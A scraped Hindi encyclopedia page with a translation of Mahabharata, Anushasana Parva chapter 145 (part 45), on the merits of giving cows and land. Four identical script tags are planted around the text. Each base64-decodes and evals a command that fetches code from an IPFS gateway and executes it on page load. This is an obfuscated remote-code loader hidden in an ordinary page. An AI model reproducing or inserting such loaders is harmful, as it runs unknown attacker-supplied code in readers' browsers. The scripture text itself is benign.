महाभारत अनुशासन पर्व अध्याय 145 भाग-45

अद्‌भुत भारत की खोज
नेविगेशन पर जाएँ खोज पर जाएँ
गणराज्य इतिहास पर्यटन भूगोल विज्ञान कला साहित्य धर्म संस्कृति शब्दावली विश्वकोश भारतकोश

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

पञ्चचत्वारिंशदधिकशततम (145) अध्‍याय: अनुशासन पर्व (दानधर्म पर्व)

महाभारत: अनुशासन पर्व: पञ्चचत्वारिंशदधिकशततम अध्याय: भाग-45 का हिन्दी अनुवाद

शुभाशुभ मानस आदि तीन प्रकार के कर्मो कास्वरुप और उनके फल का एवं मद्द्सेवन के दोषों कावर्णन,आहार-शुद्धि,मांसभक्षण से दोष,मांस न खानेसे लाभ,जीवदया के महत्व,गुरुपूजा कीविधि,उपवास-विधि,ब्र्हमचर्यपालन,तीर्थचर्चा,सर्वसाधारण द्रव्य के दान से पुण्य,अन्न,सुवर्ण, गौभुमि, कन्या और विद्यादान का माहात्म्य , पुण्यतम देशकाल, दिये हुये दान और धर्म की निष्फलता, विविध प्रकार के दान, लौकिक-वैदिक यज्ञ तथा देवताऔं की पूजा का निरुपण

जो काँस के दुग्धपात्र और सोने से मढ़े हुए सींगों वाली कपिला गौ का वस्त्रसहित दान करता है, वह अपने पुत्रों, पौत्रों तथा सातवीं पीढ़ी तक के समस्त कुल का परलोक में उद्धार कर देता है। जो अपने ही यहाँ पैदा हुई हों, खरीदकर लायी गयी हों, जुए में जीत ली गयी हों, बदले में दूसरा कोई प्राणी देकर खरीदी गयी हों, जल हाथ में लेकर संकल्पपूर्वक दी गयी हों, अथवा युद्ध में बलपूर्वक जीती गयी हों, संकट से छुड़ाकर लायी गयी हों, या पालन-पोषण के लिये आयी हों- इन द्वारों से प्राप्त हुई गौओं का दान करना चाहिये। जीविका के बिना दुर्बल, अनेक पुत्र वाले, अग्निहोत्री, श्रोत्रिय ब्राह्मण को दूध देने वाली नीरोग गाय का दान करके दाता सर्वोत्तम लोकों को प्राप्त होता है। जो क्रूर, कृतघ्न, लोभी, असत्यवादी और हव्य-कव्य से दूर रहने वाला हो, ऐसे मनुष्य को किसी तरह गौएँ नहीं देनी चाहिये। जो मनुष्य समान रंग के बछड़े वाली, सीधी-सादी एवं दूध देने वाली गाय को वस्त्र ओढ़ाकर ब्राह्मण को दान करता है, वह सोमलोक में प्रतिष्ठित होता है। जो समान रंग के बछड़े वाली, सीधी-सादी एवं दूध देने वाली काली गौ को वस्त्र ओढ़ाकर उसका ब्राह्मण को दान करता है, वह जल के स्वामी वरूण के लोकों में जाता है। जिसके शरीर का रंग सुनहरा, आँखें, भूरी, साथ में बछड़ा और काँस की दुहानी हो, उस गौ को वस्त्र ओढ़ाकर दान करने से मनुष्य कुबेर के धाम में जाते हैं। वायु से उड़ी हुई धूलि के समान रंगवाली, बछड़े सहित, दूध देने वाली गाय को कपड़ा ओढ़ाकर काँस के दुहानी के साथ दान देकर दाता वायुलोक में प्रतिष्ठित होता है। जो समान रंग के बछड़े वाली, सीधी-सादी, धौरी एवं दूध देने वाली धेनु को वस्त्र से आच्छादित करके उसका दान करता है, वह अग्निलोक में प्रतिष्ठित होता है। जो लोग महामनस्वी श्रोत्रिय ब्राह्मणों को नौजवान, बड़े सींगवाले, बलवान्, श्यामवर्ण, एक सौ गौओं सहित यूथपति गवेन्द्र (साँड़) को पूर्णतः अलंकृत करके उसे श्रेष्ठ ब्राह्मण के हाथ में दे देते हैं, वे बारंबार जन्म लेने पर ऐश्वर्य के साथ ही जन्म लेते हैं। गौओं के मल-मूत्र से कभी उद्विग्न नहीं होना चाहिये और उनका मांस कभी नहीं खाना चाहिये। सदा गौओं का भक्त होना चाहिये। जो पवित्र भाव से रहकर एक वर्ष तक दूसरे की गाय को एक मुट्ठी ग्रास खिलाता है और स्वयं आहार नहीं करता, उसका वह व्रत सम्पूर्ण कामनाओं को देने वाला होता है। गौओं के पास प्रतिदिन दोनों समय उनके कल्याण की बात कहनी चाहिये। कभी उनका अनिष्ट-चिन्तन नहीं करना चाहिये। ऐसा धर्मज्ञ पुरूषों का मत है। गौएँ परम पवित्र वस्तु हैं, गौओं में सम्पूर्ण लोक प्रतिष्ठित हैं। अतः किसी तरह गौओं का अपमान नहीं करना चाहिये, क्योंकि वे सम्पूर्ण जगत् की माताएँ हैं। इसीलिये गौओं का दान सबसे उत्कृष्ट बताया जाता है। गौओं की पूजा तथा उनके प्रति की हुई भक्ति मनुष्य की आयु बढ़ाने वाली होती है। इसके बाद मैं भूमिदान का महत्व बतलाऊँ। भूमिदान का महान् फल है। संसार में भूमिदान के समान दूसरा कोई दान नहीं है। यही धर्मात्मा पुरूषों का निश्चय है। गृह अथवा क्षेत्र से युक्त भू-भाग का दान करना चाहिये।


« पीछे आगे »

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

संबंधित लेख

साँचा:सम्पूर्ण महाभारत अभी निर्माणाधीन है।

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>